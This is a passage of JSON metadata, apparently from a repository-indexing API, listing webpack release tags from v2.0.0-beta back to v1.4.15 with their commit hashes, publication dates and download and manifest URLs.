c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_pa